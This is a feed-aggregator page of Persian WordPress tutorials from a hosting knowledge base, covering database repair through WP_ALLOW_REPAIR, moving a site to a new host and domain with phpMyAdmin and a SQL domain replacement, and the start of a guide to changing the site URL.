Quantcast
Channel: آموزش سیستم مدیریت محتوا ها
Viewing all 383 articles
Browse latest View live

آموزش تعمیر دیتابیس وردپرس

$
0
0

تعمیر دیتابیس وردپرس و بهینه سازی ساختار دیتابیس مثل هر سیستم مدیریت محتوای رایگان یا اختصاصی یکی از موارد لازم برای بهینه سازی سایت می‌باشد. همانطور که در هر لحظه مطالب و دیدگاه‌های مختلفی بسته به میزان بازدید سایت به آن اضافه می‌شود به همین نسبت برخی داده‌های اضافه نیز به دیتابیس وارد می‌شوند که لازم است هرازگاهی اقدام به بهینه کردن دیتابیس وردپرس کرده و با پاک کردن داده‌های اضافی در دیتابیس وردپرس اقدام به تعمیر پایگاه داده وردپرس بکنید. در اکثر موارد وقتی کاربران قصد تعمیر دیتابیس وردپرس را دارند طبق معمول به دنبال این هستند که با نصب افزونه تعمیر دیتابیس وردپرس این کار را انجام دهند، غافل از اینکه وردپرس خود دارای ابزاری برای تعمیر پایگاه داده وردپرس و بهینه سازی خود می‌باشد.

در این آموزش از پایگاه دانش میزبان‌فا قصد معرفی ابزاری که در قلب وردپرس برای تعمیر دیتابیس وردپرس وجود دارد را دارم که با استفاده از این روش میتونید بدون نیاز به استفاده از افزونه تعمیر دیتابیس وردپرس اقدام به آماده سازی و بهینه کردن دیتابیس وردپرس بکنید. پس اگر فکر می‌کنید سایت شما هم کند شده و در لود اطلاعات کمی دیر پاسخگو هست تا انتهای این آموزش همراه ما باشید تا به نحوه بهینه سازی دیتابیس وردپرس و تعمیر ان بپردازیم.

آموزش تعمیر دیتابیس وردپرس

ابزار تعمیر دیتابیس وردپرس درست در قلب و هسته وردپرس قرار داره که امکان تعمیر پایگاه داده را به شما خواهد داد. بنابراین این ابزار در حالت عادی فعال نیست و قبل از هر کاری باید قابلیت تعمیر دیتابیس در وردپرس را فعال کنید. به نظر شما برای فعال کردن این قابلیت باید از چه طریقی اقدام کنیم؟ اگر فکر می‌کنید باید از طریق فایل کانفیگ وردپرس باید این کار را انجام داد درست حدس زدید، مثل همیشه برای فعال کردن چنین ابزاری باید از طریق فایل wp-config.php اقدام کنیم.

بنابراین قبل از هر کاری ابتدا وارد هاست سی پنل یا هاست دایرکت ادمین خود شده و سپس روی گزینه File Manager هاست کلیک کنید تا به صفحه مدیریت فایل‌ها در وردپرس هدایت شوید. یا اینکه اگر از طریق FTP اقدام به مدیریت فایل‌ها می‌کنید با استفاده از نرم افزار مدیریت فایل هاست Filezilla وارد روت اصلی هاست یعنی public_html شوید.

حالا که وارد محیط فایل منیجر شدید به دنبال فایل wp-config.php در وردپرس بگردید. در ضمن اگر اقدام به نصب وردپرس در ساب فولدر یا نصب وردپرس در ساب دامنه کردید باید وارد پوشه‌ای که وردپرس در اون مسیر قرار داره شده و سپس به دنبال فایل wp-config.php بگردید. سپس مشابه تصویر زیر در هاست سی پنل روی فایل راست کلیک کرده و گزینه Edit را انتخاب کنید تا صفحه ویرایش فایل باز شود.

آموزش تعمیر دیتابیس وردپرس و نحوه تعمیر پایگاه داده وردپرس

بعد از اینکه صفحه ویرایش فایل wp-config.php باز شد باید کد فعال کردن تعمیر دیتابیس وردپرس را در این فایل قرار دهید. بنابراین قطعه کد زیر را در مکان مناسبی از این فایل درست در بالای خط /* That’s all, stop editing! Happy blogging. */ قرار دهید.

define('WP_ALLOW_REPAIR', true);

دقت داشته باشید که در صورتی که این قطعه کد از قبل در فایل کانفیگ وردپرس قرار داره باید مقدار اون را روی true قرار دهید. در صورتی که مقدار این کد روی false باشه تعمیر دیتابیس در وردپرس غیرفعال خواهد بود. همچنین توجه داشته باشید که قبل از انجام هر تغییری در این فایل یک نسخه کپی به عنوان پشتیبان تهیه کنید تا در صورت بروز خطا سریعا قادر به برطرف کردن آن باشید.

حالا که کد را در فایل قرار دادین فایل را ذخیره کرده و عبارت wp-admin/maint/repair.php/ را به انتهای آدرس سایت خودتون اضافه کنید. به عنوان مثال اگر ما در دامنه اصلی میزبا‌فا قصد تعمیر دیتابیس وردپرس را داشته باشیم باید به آدرس زیر مراجعه کنیم.

https://mizbanfa.net/wp-admin/maint/repair.php

بعد از اینکه قابلیت تعمیر پایگاه داده وردپرس فعال شد با مراجعه به آدرس فوق صفحه‌ای مشابه تصویر زیر برای شما باز خواهد شد که امکان تعمیر پایگاه داده وردپرس و تعمیر و بهینه‌سازی پایگاه داده وردپرس را به شما خواهد داد. که هر یک از این دکمه‌ها کاری را انجام خواهند داد.

آموزش تعمیر دیتابیس وردپرس و نحوه تعمیر پایگاه داده وردپرس

  • تعمیر پایگاه داده وردپرس: در صورت انتخاب این گزینه وردپرس شروع به بررسی یک به یک جداول کرده و اقدام به تعمیر آنها خواهد کرد. اما گاهی ممکن است قادر نباشد تا کلیه جداول را تعمیر کند.
  • تعمیر و بهینه‌سازی پایگاه داده وردپرس: در صورت انتخاب این گزینه هم دیتابیس شروع به بهینه سازی جداولی خواهد کرد که تاکنون هیچ گونه بهینه سازی و تعمیر در آنها صورت نگرفته است.

بنابراین اگر قصد تعمیر پایگاه داده در وردپرس را دارید ابتدا باید از طریق دکمه اول اقدام به این کار کنید تا بعد از تعمیر دیتابیس ببینید آیا جدولی باقی مانده است که هنوز وردپرس در این حالت قادر به بهینه سازی آن نبوده است یا خیر. سپس اگر دیدید که برخی جداول بهینه نشده‌اند می‌توانید با استفاده از دکمه دوم که شامل تعمیر و بهینه سازی است کار را محکم کاری کرده و کلیه جداول را در وردپرس تعمیر کنید.

دقت داشته باشید که، قبل از انجام هر گونه تعمیر و بهینه سازی در دیتابیس وردپرس حتما اقدام به تهیه بک آپ و پشتیبان گیری از دیتابیس وردپرس بکنید. چرا که ممکن است در حین انجام عملیات بهینه سازی به هر دلیلی مثل قطع ارتباط با سرور و یا مشکلاتی در دیتابیس به جای تعمیر دیتابیس کار را خراب‌تر کنید.

حالا که اقدام به تهیه بک آپ از دیتابیس کردید روی اولین دکمه کلیک کرده و بسته به حجم دیتابیس منتظر بمانید تا عملیات تعمیر دیتابیس در وردپرس صورت گیرد. بعد از اینکه کار به اتمام رسید نتیجه آن مانند تصویر زیر به شما نمایش داده خواهد شد.

آموزش تعمیر دیتابیس وردپرس و نحوه تعمیر پایگاه داده وردپرس

همانطور که در تصویر میبینید لیست کلیه جدول‌های دیتابیس وردپرس نمایش داده شده و نتیجه سالم بودن و یا ناسالم بودن انها نیز نمایش داده خواهد شد. با انجام این کار هر جدول بررسی شده و پس از بررسی اگر سالم بود به سراغ جدول بعدی خواهد رفت اما اگر سالم نبود اقدام به تعمیر جدول دیتابیس در وردپرس خواهد کرد. سپس بعد از تعمیر جدول فعلی به سراغ جداول بعدی رفته و همینکار برای کلیه جدول‌ها در وردپرس صورت گرفته و نتیجه آن نمایش داده خواهد شد.

اما اگر در صورتی که برخی از جداول سالم نبودند باید مجددا به صفحه wp-admin/maint/repair.php/ در سایت خود برگردید و این بار روی دکمه تعمیر و بهینه سازی پایگاه داده وردپرس کلیک کنید. انجام این کار ممکن است کمی طول بکشد. چرا که علاوه بر تعمیر جداول در وردپرس بهینه سازی نیز روی آنها صورت خواهد گرفت. حال بعد از اینکه کار بهینه سازی هم انجام گرفت و نتیجه آن را مشاهده کردید خواهید دید که دیتابیس بهینه‌تر شده و سایت با قدرت پردازش سریع‌تر و بیشتری نمایش داده خواهد شد.

امیدوارم که این آموزش هم مورد توجه و پسند شما قرار گرفته باشه و با استفاده از این آموزش تونسته باشید اقدام به تعمیر دیتابیس وردپرس و بهینه سازی پایگاه داده در وردپرس بدون نیاز به استفاده از افزونه تعمیر پایگاه داده در وردپرس بکنید. در صورتی که در رابطه با این آموزش سوال یا مشکلی داشتید در بخش دیدگاه‌ها اعلام کنید تا در کوتاه‌ترین زمان ممکن پاسخگوی شما باشم.

نوشته آموزش تعمیر دیتابیس وردپرس اولین بار در پدیدار شد.


آموزش انتقال وردپرس به هاست و دامنه دیگر

$
0
0

انتقال وردپرس به هاست و دامنه دیگر زمانی رخ میده که کاربران قصد تغییر دامنه سایت خودشون را دارند. گاها پیش میاد که به دلیل انتخاب عجولانه در نام دامنه بعده‌ها دامنه بهتری را برای راه‌اندازی سایت پیدا می‌کنید و همین مسئله باعث میشه تصمیم به تغییر ادرس در وردپرس بگیرید. بنابراین لازمه تا سایت فعلی که روی دامنه اولیه ساختید را به هاست و دامنه جدید منتقل کنید. اینجاست که نیاز به انتقال وردپرس به هاست دیگر خواهید داشت و برای عملیات انتقال وردپرس از یک هاست به هاست دیگر و همچنین انتقال وردپرس به دامنه دیگر را پیدا خواهید کرد.

در این آموزش از پایگاه دانش میزبان‌فا قصد دارم به نحوه انتقال وردپرس به دامنه دیگر بپردازم که با استفاده از این آموزش میتونید سایت وردپرس خود را از یک هاست و دامنه به هاست و دامنه دیگر در وردپرس منتقل کنید. پس اگر شما هم تصمیم به تغییر هاست یا تغییر دامنه خودتون گرفتید تا انتهای این آموزش با ما همراه باشید تا نحوه انتقال وردپرس به هاست دیگر را با هم فرا بگیریم.

آموزش انتقال وردپرس به هاست و دامنه دیگر

عملیات انتقال وردپرس از یک هاست به هاست دیگر هم درست مشابه همان کاری است که در انتقال وردپرس از لوکال هاست زمپ به هاست سی پنل با هم مشاهده کردیم. با این تفاوت که در اینجا محیط تفاوت داره به علاوه اینکه در انتها باید نام دامنه جدید خودتون را به جای نام دامنه قدیمی قرار دهید. بنابراین میشه گفت کار انتقال وردپرس از یک هاست به هاست دیگر شامل موارد زیر خواهد بود.

  1. خروجی گرفتن از فایل‌های موجود در هاست
  2. آپلود فایل‌های خروجی گرفته شده در هاست جدید
  3. خروجی گرفتن از دیتابیس وردپرس دامنه و هاست اولیه
  4. ساخت دیتابیس در هاست و دامنه جدید
  5. درون ریزی دیتابیس خروجی گرفته شده در هاست و دامنه جدید
  6. ویرایش فایل wp-config.php وردپرس و وارد کردن اطلاعات دیتابیس جدید
  7. به‌روزرسانی و تصحیح آدرس دامنه به طوری که دامنه جدید را در دیتابیس جایگزین دامنه قبلی کنید
  8. انتقال و ریدایرکت کاربران از دامنه قبلی به دامنه جدید(اختیاری)
پیش از انجام هر کاری برای انتقال وردپرس از یک هاست به هاست و دامنه دیگر اقدام به تهیه نسخه پشتیبان از دیتابیس وردپرس و فایل‌های موجود در هاست خودتون بکنید تا در صورت بروز خطا و مشکل خاصی بتونید سریعا با جایگزین کردن نسخه پشتیبان مشکلات را برطرف کنید.

حالا که نسخه پشتیبان را از سایت و هاست خودتون تهیه کردید بعد از طی مراحل هشت گانه قادر هستید وردپرس خود را از یک هاست و دامنه به هاست و دامنه دیگر منتقل کنید. دقت داشته باشید که کلیه این مراحل باید به دقت انجام گیرد. قبل از اینکه اقدام به عملیات انتقال وردپرس به هاست و دامنه دیگر بکنید باید دامنه جدید و هاست جدید از طریق ست کردن NameServer های دامنه به درستی متصل شده باشند و برای هر آی‌پی از هر کشوری هاست به دامنه متصل شده باشد. اتصال هاست به دامنه معمولا تا 72 ساعت طول خواهد کشید، پس مطمئن شوید که هاست و دامنه جدید به درستی به هم متصل شده باشند و سپس مراحل زیر را برای انجام عملیات انتقال وردپرس ادامه دهید.


خروجی گرفتن از فایل‌های وردپرس هاست قدیم

اولین کاری که برای انتقال وردپرس به هاست و دامنه دیگر باید انجام بدید تهیه یک فایل خروجی از فایل های موجود در file manager هاست است. پس برای تهیه خروجی از فایل‌های وردپرس لازمه ابتدا وارد هاست سی‌پنل یا دایرکت ادمین خودتون شده و یک نسخه خروجی از کلیه فایل‌های وردپرس با فرمت ZIP. تهیه کنید. بنابراین بعد از آدرس سایتتون از عبارت 2222: برای ورود به هاست دایرکت ادمین و از عبارت 2082: برای ورود به هاست سی پنل استفاده کنید. سپس در صفحه ورود به هاست فیلدهای نام کاربری و رمز عبور اطلاعاتی که هنگام خرید هاست در اختیار شما قرار گرفته را وارد کنید. سپس اگر هاست شما سی‌پنل هست مشابه تصویر زیر از بخش Files روی گزینه File Manager کلیک کنید تا به صفحه مدیریت فایل در هاست سی‌پنل هدایت شوید.

آموزش انتقال وردپرس به هاست دیگر و نحوه انتقال وردپرس به دامنه دیگر

بعد از اینکه وارد صفحه مدیریت فایل ها در هاست شدید به مسیر public_html که مربوط به فایل های سایت شما میشه مراجعه کنید. سپس با انتخاب Select All کلیه فایل‌ها و پوشه‌های مربوط به وردپرس را انتخاب کنید. بعد از اینکه فایل‌ها و پوشه‌های وردپرس انتخاب شدند روی آنها راست کلیک کنید و گزینه Compress را برای تهیه خروجی انتخاب کنید.

آموزش انتقال وردپرس به هاست دیگر و نحوه انتقال وردپرس به دامنه دیگر

بعد از کلیک روی گزینه Compress پنجره زیر برای شما نمایش داده میشه که در اون باید ابتدا فرمت فایل خروجی را در حالت ZIP انتخاب کنید و سپس در انتهای پنجره مسیر مورد نظر برای ذخیره فایل به همراه عنوان اون را وارد کنید.

آموزش انتقال وردپرس به هاست دیگر و نحوه انتقال وردپرس به دامنه دیگر

بنابراین فرمت فایل مورد نظر برای خروجی گرفتن را روی zip. قرار داده و سپس فایل خروجی را با نام دلخواه تعیین کنید. در نهایت روی دکمه Compress Files کلیک کرده و منتظر بمونید تا فایل خروجی بسته به میزان حجم داده‌های سایت تهیه بشه. حالا بعد از اینکه فایل خروجی شما ایجاد شد اونو دانلود کنید و در سیستم خودتون ذخیره کنید تا در هاست جدید اونو آپلود کنید.

آپلود فایل‌های خروجی وردپرس در هاست جدید

در این مرحله باید فایل ZIP. خروجی گرفته شده را که شامل تمامی فایلهای موجود و مورد نیاز وردپرس میباشد را در هاست جدید آپلود کنیم. بنابراین وارد هاست جدید شده و گزینه File Manager که در کنترل پنل هاست میباشد را انتخاب کنید. سپس به مسیر Public_html مراجعه کرده و با انتخاب دکمه Upload که مشابه تصویر زیر میبینید اقدام به آپلود فایل خروجی در هاست جدید بکنید.

آموزش انتقال وردپرس به هاست دیگر و نحوه انتقال وردپرس به دامنه دیگر

در صفحه ی باز شده، از طریق دکمه‌ی select file فایل خروجی دانلود شده را انتخاب کنید و منتظر بمونید تا عملیات آپلود تا انتها پیش رود.

آموزش انتقال وردپرس به هاست دیگر و نحوه انتقال وردپرس به دامنه دیگر

پس از اتمام آپلود در همان مسیر فایل ZIP. که از هاست قبلی تهیه کردید را میبینید. روی فایل راست کلیک کرده و سپس گزینه extract کلیک کنید تا فایل‌ها از حالت فشرده استخراج شوند.

آموزش انتقال وردپرس به هاست دیگر و نحوه انتقال وردپرس به دامنه دیگر

تا اینجا ما فایل‌های وردپرس را به درستی و در مسیر public_html هاست جدید قرار دادیم و حالا باید دیتابیس موجود در هسات قدیمی را هم در هاست جدید درون ریزی کنیم.


خروجی گرفتن از دیتابیس وردپرس در هاست قدیمی

برای تهیه خروجی از دیتابیس وردپرس به صفحه اصلی هاست قدیمی مراجعه کرده و سپس مشابه تصویر زیر از بخش Databases روی گزینه phpmyadmin کلیک کنید تا به صفحه مدیریت دیتابیس در phpmyadmin هدایت شوید.

آموزش انتقال وردپرس به هاست دیگر و نحوه انتقال وردپرس به دامنه دیگر

بعد از کلیک روی گزینه phpmyadmin مطابق تصویر زیر به صفحه ای هدایت خواهید شد که در اون از شما میخواهد تا نام کاربری و رمز ورود بهphpmyadmin را وارد کنید. بنابراین در صفحه باز شده ممکنه از شما نام کاربری و رمز عبور ورود به phpmyadmin هاست درخواست شود در این صورت باید از همان نام کاربری و رمز برای ورود به محیط دیتابیس هاست استفاده کنید.

حالا که وارد صفحه phpmyadmin در هاست قدیمی شدید ابتدا از سمت چپ روی نام پایگاه داده ای که قصد دارید تا از اون خروجی تهیه کنید کلیک کنید. سپس از سربرگ بالا گزینه Export را انتخاب کنید و مشابه تصویر زیر از قسمت Format نوع فایل خروجی را روی SQL انتخاب کرده و در نهایت روی دکمه Go کلیک کنید. بسته به میزان حجم دیتابیس منتظر بمونید تا خروجی از دیتابیس وردپرس تهیه شده و در نهایت فایل تهیه شده را دانلود کنید.

آموزش انتقال وردپرس به هاست دیگر و نحوه انتقال وردپرس به دامنه دیگر

بعد از اینکه فایل دیتابیس شما هم آماده شد و اونو دانلود کردید تا اینجا کار ما با هاست قدیمی تموم شده و نیازی به هاست نداریم و باقی مراحل انجام انتقال وردپرس به هاست دیگر را باید در هاست جدید ادامه دهیم.

ساخت دیتابیس در هاست جدید

در این مرحله لازمه ابتدا یک پایگاه داده جدید در هاست جدید ایجاد کنیم و سپس با درون ریزی پایگاه داده‌ای که در مرحله قبل از هاست قدیمی خروجی گرفتیم را به این دیتابیس جدید ایمپورت کنیم. پس برای ساخت پایگاه داده جدید در هاست ابتدا به صفحه اصلی کنترل پنل هاست خودتون مراجعه کنید و سپس مشابه تصویر زیر روی دکمه MySQL database wizard کلیک کنید تا به صفحه ساخت دیتابیس جدید در هاست هدایت شوید.

آموزش انتقال وردپرس به هاست دیگر و نحوه انتقال وردپرس به دامنه دیگر

پس از کلیک روی دکمه مورد نظر به صفحه‌ای مشابه تصویر زیر هدایت خواهید شد، یک نام دلخواه برای پایگاه داده جدید وردپرس انتخاب کنید و سپس روی دکمه Next Step کلیک کنید تا وارد مرحله تعیین نام کاربری پایگاه داده وردپرس و رمز پایگاه داده وردپرس شده و در نهایت دیتابیس خودتون رو بسازید.

آموزش انتقال وردپرس به هاست دیگر و نحوه انتقال وردپرس به دامنه دیگر

پس از اینکه روی دکمه Next Step کلیک کنید به صفحه‌ای مشابه تصویر زیر هدایت مشوید که در اون میتونید تا نام کاربری پایگاه داده، رمز پایگاه داده رو انتخاب کنید و در نهایت پایگاه داده خودتونو ایجاد کنید. با استفاده از دکمه Password Generator قادر خواهید بود تا یک رمز قوی که سی پل به صورت خودکار برای سما میسازه ایجاد کنید و از اون برای رمز پایگاه داده خودتون استفاده کنید. در این مرحله دقت کافی را داشته باشید که رمز رو در جایی مطمئن کپی کنید و اونو هیچوقت فراموش نکنید چرا که در آینده و در مراحل بعد به این رمز و نام‌های انتخاب شده احتیاج پیدا خواهید کرد.

آموزش انتقال وردپرس به هاست دیگر و نحوه انتقال وردپرس به دامنه دیگر

در نهایت پس از پر کردن کلیه فیلدهای بالا به صفحه دیگری مشابه تصویر زیر هدایت خواهید شد، در این مرحله تیک گزینه ی ALL PRIVILEGES رو بزنین و روی next step کلیک کنین تا ارتباط بین یوزر و پایگاه داده برقرار بشه و سطح دسترسی های یوزر هم تصحیح بشه.

آموزش انتقال وردپرس به هاست دیگر و نحوه انتقال وردپرس به دامنه دیگر

بعد از کلیک روی Next Step در این مرحله پایگاه داده به درستی ساخته شده و پیغام موفقیت آمیز بودن اون به شما نمایش داده میشود.

درون ریزی دیتابیس وردپرس در هاست جدید

بعد از اینکه پایگاه داده رو ساختید باید وارد phpmyadmin هاست جدید شده و فایل خروجی پایگاه داده‎ای که از هاست قبلی ازش خروجی گرفتید رو داخل این دیتابیس در هاست جدید ایمپورت کنید. بنابراین به صفحه اصلی کنترل پنل هاست مراجعه کنید و از قسمت databases گزینه‌ی phpmyadmin رو مشابه تصویر زیر انتخاب کنید.

آموزش انتقال وردپرس به هاست دیگر و نحوه انتقال وردپرس به دامنه دیگر

پس از ورود به phpmyadmin، پایگاه داده‌ی جدید رو که در مرحله قبل ساختیم را انتخاب کنید و روی دکمه import که در بالای صفحه قرار داره کلیک کنید. سپس در صفحه‌ی import روی browse کلیک کرده و فایل .sql ذخیره شده را که در کامپیوتر خودمون ذخیره کردیم انتخاب کنید. در نهایت با کلیک روی دکمه go که در انتهای صفحه قرار داره کلیک کنید. منتظر بمونید تا عملیات درون ریزی دیتابیس تا انتها انجام بگیره به طوری که در باکسی با رنگ سبز نتیجه درون ریزی را با موفقیت ببینید.

آموزش انتقال وردپرس به هاست دیگر و نحوه انتقال وردپرس به دامنه دیگر

در این مرحله باید با تمام دقت پیش برید چرا که اگر مشابه تصویر بالا شما چندین دیتابیس داشته باشید در صورتی که به اشتباه تو دیتابیس دیگه عملیات ایمپورت و درون ریزی انجام بگیره باعث ایجاد مشکل برای شما خواهد شد. در نهایت بعد از کلیک روی دکمه Go پیغام سبز رنگ به شما نشان داده خواهند شد.

بعد از اینکه دیتابیس با موفقیت در پایگاه داده مورد نظر اضافه شد حالا نوبت به ایجاد ارتباط دیتابیس با فایل‌های وردپرس میرسه که از طریق ویرایش فایل wp-config.php در هاست جدید صورت خواهد گرفت.


ویرایش فایل wp-config.php و وارد کردن اطلاعات دیتابیس جدید

برای این کار نیاز داریم تا ابتدا وارد File Manager هاست جدید بشیم. بنابراین به صفحه اصلی هاست مراجعه کرده و سپس از قسمت Files مشابه تصویر زیر روی دکمه File Manager کلیک کنید.

آموزش انتقال وردپرس به هاست دیگر و نحوه انتقال وردپرس به دامنه دیگر

بعد از ورود به محیط فایل منیجر هاست حالا باید فایل wp-config.php را ویرایش کنیم. وارد مسیری که فایل‌های وردپرس را در مراحل قبل طبق این آموزش آپلود کرده و سپس از حالت فشرده خارج کردید مراجعه و در نهایت فایلی که با نام wp-config.php قرار داره را انتخاب و با راست کلیک کردن روی فایل مورد نظر مشابه تصویر زیر گزینه Edit را انتخاب کنید تا به صفحه ویرایش فایل هدایت شوید.

آموزش انتقال وردپرس به هاست دیگر و نحوه انتقال وردپرس به دامنه دیگر

بعد از اینکه صفحه ویرایش فایل wp-config.php براتون باز شد اطلاعات دیتابیس را که در هاست جدید ساختید در این فایل وارد کنید. مشابه چیزی که در تصویر میبینید عمل کنید و اطلاعات دیتابیس را بر اساس توضیحات ارائه شده وارد کنید. دقت کنید که، اطلاعات فعلی که در این فایل قرار داره مربوط به دیتابیس هاست قبلی هستند و باید اطلاعات دیتابیس هاست جدید را جایگزین آنها کنید.

آموزش انتقال وردپرس به هاست دیگر و نحوه انتقال وردپرس به دامنه دیگر

DB_NAME: نام پایگاه داده جدید رو وارد کنید.

DB_USER: نام یوزر پایگاه داده جدید رو وارد کنید.

DB_PASSWORD: رمزعبور کاربر پایگاه داده جدید رو وارد کنید و در آخر با کلیک روی دکمه Save که در بالای صفحه قرار داره فایل رو ذخیره کنید. در این مرحله  اصلاح ارتباط پایگاه داده ما هم تموم شده و لازمه تا آدرس های سایت را اصلاح کنیم.

به‌روزرسانی آدرس‌های دامنه جدید در دیتابیس وردپرس

در مرحله‌ی آخر انتقال وردپرس به هاست و دامنه دیگر باید لینک‌های سایت را تصحیح کنیم. چرا که دامنه ما تغییر کرده و قصد داریم سایت با دامنه جدید را با همان محتوا بالا بیاوریم.

بنابراین وارد phpmyadmin هاست جدید شده و جدول wp-options برای دیتابیس جدید ساخته شده را انتخاب کنید. البته این امکان وجود داره که به دلیل تغییر پیشوند جداول وردپرس که در حالت عادی روی _wp هستش این بخش با یک نام دیگه برای شما نشون داده بشه که در هر صورت بعد از پیشوند جدول عبارت options قرار خواهد داشت. بسته به نامی که انتخاب کردید به این تیبل مراجعه کرده و سپس در رکوردهای جدول که بهتون نمایش داده میشه رکوردهای siteurl و home را پیدا کنید و نام دامنه‌ی سایتتون رو داخلش جایگزین کنید.

آموزش انتقال وردپرس به هاست دیگر و نحوه انتقال وردپرس به دامنه دیگر

برای این کار کافیه روی دکمه Edit که مشابه تصویر فوق در بخش siteurl و home قرار داره کلیک کنید. سپس در صفحه ویرایش مشابه تصویر زیر آدرس دامنه جدید را وارد کنید. برای نمونه در این تصویر صفحه ویرایش siteurl را مشاهده میکنید که در ویرایش رکورد home نیز به همین شکل خواهد بود.

آموزش انتقال وردپرس به هاست دیگر و نحوه انتقال وردپرس به دامنه دیگر

بعد از اینکه نام دامنه رو برای سایتتون تنظیم کردین باید لینک‌های داخلی وردپرس رو هم بروزرسانی کنید تا کلیه لینک‌های موجود در سایت بر اساس نام دامنه تنظیم شوند. برای این کار روی نام پایگاه داده ی سایت داخل phpmyadmin کلیک کنید، سپس سربرگ sql رو باز کنین و کد زیر رو داخلش تایپ کنید.

UPDATE wp_posts SET post_content = REPLACE (post_content, 'old-domain.com', 'new-domain.com/');

به جای old-domain.com در کد بالا نام دامنه قبلی و به جای new-domain.com نام دامنه جدید را در فیلد Run SQL query/queries on database قرار داده و در نهایت روی دکمه Go کلیک کنید و منتظر بمونید تا عملیات به‌روزرسانی انجام بگیرد. بعد از این کار سایت شما با موفقیت در هاست و دامنه جدید لود خواهد شد. حالا باید سایت با دامنه جدید را بررسی کنید. اگر کلیه مراحل را به درستی طی کرده باشید وردپرس به درستی از یک هاست به هاست و دامنه دیگر منتقل شده است.


ریدایرکت 301 وردپرس از دامنه قدیمی به دامنه جدید

انجام این کار کاملا اختیاری هست و به شرایط شما بستگی دارد. اگر در وردپرس خودتون لینک‌های زیادی دارید و همچنین در گوگل عملیات ایندکس تا حد خوبی پیش رفته حتما باید این کار را انجام بدین تا کلیه امتیاز برای دامنه جدید ثبت شود. اما اگر سایت قبلی هم به تازگی راه‌اندازی شده و اطلاعات زیادی در اون نیست نیازی به این کار نخواهید داشت. بنابراین باید امکان انتقال کامل سایت را از دامنه قدیمی به دامنه جدید به صورت ریدایرکت 301 در وردپرس انجام دهید.

مثل همیشه برای این کار استفاده از افزونه میتونه راحت‌ترین کار برای شما باشد. برای این کار کافیه از مقاله آموزش نحوه ریدایرکت لینک ها به یک دیگر در وردپرس استفاده کرده و کلیه صفحات سایت وردپرس خودتون را از دامنه قبلی به صورت ریدایرکت 301 به دامنه جدید منتقل کنید که هر گاه کاربری به صفحه‌ای در دامنه قبلی مراجعه کرد به همان صفحه در دامنه جدید انتقال یابد.

اما ماجرا صرفا به اینجا ختم نمیشه و باید کارهای معرفی دامنه جدید به گوگل را هم انجام بدین. برای این کار هم میتونید از مقاله آموزش معرفی سایت وردپرسی به گوگل استفاده کرده و دامنه جدید را در گوگل وبمستر ثبت کنید. در نهایت با انجام این کارها وردپرس به درستی از یک هاست به هاست دیگر و از یک دامنه به دامنه دیگر منتقل شده و حالا میتونید سایت خودتون را با آدرس جدید و دلخواه خودتون مدیریت کرده و توسعه دهید.

امیدوارم این آموزش هم مورد توجه و پسند شما قرار گرفته باشه و با استفاده از این آموزش تونسته باشید نسبت به انتقال وردپرس به هاست دیگر اقدام کنید. در این مقاله ما کلیه مراحلی که برای انتقال وردپرس از یک هاست به هاست دیگه بود را به گونه‌ای یاد گرفتیم که نحوه انتقال وردپرس از دامنه‌ای به دامنه دیگر هم در اون ذکر شده بود. بنابراین در این مقاله علاوه بر یادگیری انتقال وردپرس نحوه تغییر دامنه در وردپرس را هم یاد گرفتیم. در آموزش‌های بعدی به نحوه تغییر آدرس دامنه در وردپرس هم خواهیم پرداخت. در صورتی که هر سوال یا مشکلی درباره این آموزش داشتید در بخش دیدگاه‌ها اعلام کنید تا در کوتاه‌ترین زمان ممکن پاسخگوی شما باشم.

نوشته آموزش انتقال وردپرس به هاست و دامنه دیگر اولین بار در پدیدار شد.

آموزش تغییر نشانی سایت در وردپرس

$
0
0

تغییر نشانی سایت در وردپرس زمانی برای سایت شما کاربرد دارد که در لود سایت به دلیل تغییر تنظیمات در سایت دچار اختلال شده باشید. بیشترین نیازی که کاربران در آن نیاز به این پیدا می‌کنند که اقدام به تغییر URL در وردپرس بکنند زمانی است که قصد تغییر دامنه سایت را دارند. اما گاهی هم پیش میاد که به دلیل تغییر در ساختارهای آدرس سایت متوجه می‌شوند که بخش‌هایی از سایت مثل آدرس‌های انواع دسته‌بندی، برچسب و… به درستی کار نکرده و دچار مشکل می‌شوند. بنابراین لازمه تا یک بار تنظیمات آدرس وردپرس را بررسی کرده و اقدام به تغییر نشانی سایت در وردپرس بکنند.

در این مقاله از پایگاه دانش میزبان‌فا قصد دارم به معرفی انواع روش‌هایی که برای تغییر نشانی URL وردپرس کاربر داره بپردازم که با استفاده از این روش‌ها قادر به تغییر آدرس در وردپرس بوده و میتونید به صورت کلی اقدام به تغییر دامنه در وردپرس کرده یا اینکه اگر در ساختار آدرس‌های سایت مشکلی پیش اومده بود با ویرایش مجدد اون مشکلتون را برطرف کنید.

آموزش تغییر نشانی سایت در وردپرس

در این آموزش به معرفی پنج راهکار که با استفاده از اون میتونید اقدام به تغییر آدرس سایت در وردپرس بکنید میپردازم. با استفاده از این آموزش میتونید به صورت کلی اقدام به تغییر دامنه اصلی وردپرس بکنید یا اینکه اگر در ساختار صفحات سایت مشکلی به وجود اومده بتونید به راحتی با ویرایش آدرس‌های موجود در تنظیمات عمومی وردپرس که شامل siteurl و home هست نسبت به حل مشکل وردپرس هنگام تغییر آدرس اقدام کنید.

در صورتی که قصد استفاده از روش‌های گفته شده از این مقاله را دارید چه برای منظور تغییر دامنه در وردپرس و چه برای اینکه اقدام به حل مشکل ساختار آدرس در وردپرس بکنید. قبل از هر کاری نسخه پشتیبان از دیتابیس وردپرس تهیه کنید تا در صورت بروز هرگونه خطایی سریعا بتوانید مشکلات را برطرف کنید. همچنین در استفاده از کدهای معرفی شده در این مقاله دقت داشته باشید قبل از هر تغییری در فایل wp-config.php و functions.php یک نسخه کپی از آنها داشته باشید.

روش اول: تغییر آدرس وردپرس از تنظیمات وردپرس

اگر قصد تغییر دامنه و تغییر آدرس سایت در وردپرس را دارید استفاده از این روش بهترین راهکار خواهد بود. در صورتی که دسترسی به پیشخوان وردپرس ندارید و با ساختار آدرس وردپرس به مشکل خوردید این روش به دلیل عدم دسترسی به پیشخوان وردپرس براتون کاربردی نداره و باید از روش‌های دیگه که در ادامه مقاله معرفی شده استفاده کنید. حالا برای تغییر آدرس وردپرس از تنظیمات وردپرس کافیه ابتدا وارد پیشخوان وردپرس شده و سپس به منوی تنظیمات> عمومی مراجعه کنید. سپس مشابه تصویر زیر در دو فیلد نشانی وردپرس(URL) و نشانی سایت(URL) آدرس‌های خود را به همراه http وارد کنید. دقت کنید که در انتهای آدرس از / استفاده نکرده باشید.

تغییر نشانی سایت در وردپرس و نحوه تغییر url در وردپرس

 

